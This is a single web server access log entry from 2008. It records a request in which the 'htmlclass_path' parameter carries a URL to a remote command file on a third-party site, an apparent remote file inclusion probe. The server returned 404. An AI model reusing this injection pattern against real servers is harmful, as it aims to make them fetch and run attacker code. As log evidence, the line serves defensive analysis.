217.171.66.245 - - [28/Aug/2008:09:24:08 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
